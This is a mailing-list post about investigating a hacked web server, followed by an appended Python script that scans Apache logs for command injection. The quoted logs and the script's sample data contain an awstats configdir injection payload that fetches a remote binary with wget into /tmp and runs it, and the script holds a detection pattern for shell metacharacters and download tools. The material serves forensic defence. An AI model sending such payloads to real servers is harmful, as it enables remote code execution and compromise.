On 4 Jan 2006, at 16:28, Joachim Schipper wrote:

>> The messages in the log file indicate that they used some command
>> injection in a script to call wget and download the files into /tmp.
>> I'm fairly sure it was via a bad script, and I'm trying to locate
>> which script was used, so far with no success.
>
> There was a phpBB2 in one of the paths used. If you have phpBB enabled
> somewhere, that's a likely attack vector.

That was one of the locations that the linuxday worm was being  
downloaded from by the wget request.

On 4 Jan 2006, at 16:35, Bryan Irvine wrote:

> I'd suspect it has something more to do with an easy-to-guess  
> password.

Even if the wget entries in the /var/www/logs/error_log correspond to  
the times and dates of the files in /tmp?

bash-3.00# ls -lFa /tmp
total 68
drwxrwxrwt   2 root           wheel    512 Jan  4 18:10 ./
drwxr-xr-x  22 root           wheel    512 Jun 29  2005 ../
-rw-r--r--   1 www            wheel   3355 Jan  2 04:14 .cpanel
-rw-r--r--   1 www            wheel  18695 Jan  2 04:15 .cpanel.tmp
-rw-r--r--   1 www            wheel      0 Jan  2 05:28 .plesk

Some other suspect entries are these:

61.139.83.132 - - [02/Jan/2006:07:18:12 +0000] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo|  HTTP/1.1" 404 300
61.139.83.132 - - [02/Jan/2006:07:18:13 +0000] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo|  HTTP/1.1" 404 300
61.139.83.132 - - [02/Jan/2006:07:18:15 +0000] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo|  HTTP/1.1" 404 308

Even though we don't have awstats installed anywhere (hence the 404), there are many 404 errors for this script.

bash-3.00# locate awstats.pl
bash-3.00#

It's just a bit frustrating. Am I right in thinking that if the wget output is in /var/www/logs/error_log then it comes from a site that has no defined ErrorLog? This is a limited number of sites, but I've found no log entries from the transfer logs for those sites that correspond with the times that wget was run.

Gaby

--
Junkets for bunterish lickspittles since 1998!
http://vanhegan.net/sudoku/
http://weblog.vanhegan.net/
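As an added example (not from this thread or from any poster), the kind of triage script that does what Gaby is doing by hand: parse Apache access-log lines, URL-decode each query-string value, flag the ones carrying shell metacharacters or download/exec helpers, and separate the 404s (script absent, nothing ran) from requests that actually hit an existing script. The sample lines are constructed, modelled on the entries above, and use documentation IP ranges in place of the real addresses.

```python
import re
from datetime import datetime
from urllib.parse import unquote

# Apache access-log line (common/combined prefix): host ident user [time] "request" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) (\S+)')
# Shell metacharacters and download/exec helpers that never belong in a query value.
SHELL_META = re.compile(r'[|;`$]|\b(wget|curl|chmod)\b')

# Constructed sample lines modelled on the thread's entries; addresses are documentation ranges.
SAMPLE_LOG = """\
192.0.2.10 - - [02/Jan/2006:07:18:12 +0000] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20198%2e51%2e100%2e7%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo| HTTP/1.1" 404 300
192.0.2.10 - - [02/Jan/2006:07:18:13 +0000] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20198%2e51%2e100%2e7%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo| HTTP/1.1" 404 300
198.51.100.23 - - [02/Jan/2006:04:13:58 +0000] "GET /forum/index.php?page=;cd%20/tmp;wget%20198.51.100.7/x HTTP/1.1" 200 2312
203.0.113.5 - - [02/Jan/2006:04:20:01 +0000] "GET /index.php?page=about HTTP/1.1" 200 5120
"""

def parse_line(line):
    """Split one log line into its fields; return None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    host, ts, method, uri, status, size = m.groups()
    return {"host": host, "when": datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z"),
            "method": method, "uri": uri, "status": int(status)}

def find_injection(entry):
    """Return the first URL-decoded query value containing shell metacharacters, else None."""
    path, _, query = entry["uri"].partition("?")
    for pair in (query.split("&") if query else []):
        key, _, value = pair.partition("=")
        decoded = unquote(value)          # %3b -> ';', %2f -> '/', %20 -> ' ' ...
        if SHELL_META.search(decoded):
            return {"path": path, "param": key, "decoded": decoded}
    return None

def scan(lines):
    """All entries that carry an injection attempt, with the decoded command attached."""
    hits = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        found = find_injection(entry)
        if found:
            hits.append({**entry, **found})
    return hits

def likely_executed(hits):
    """A 404 means the targeted script was absent; only non-error statuses could have run anything."""
    return [h for h in hits if h["status"] < 400]
```

Run scan() over every vhost's access log and compare the timestamps of likely_executed() hits against the mtimes of the files in /tmp; the 404 hits are noise for that correlation.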
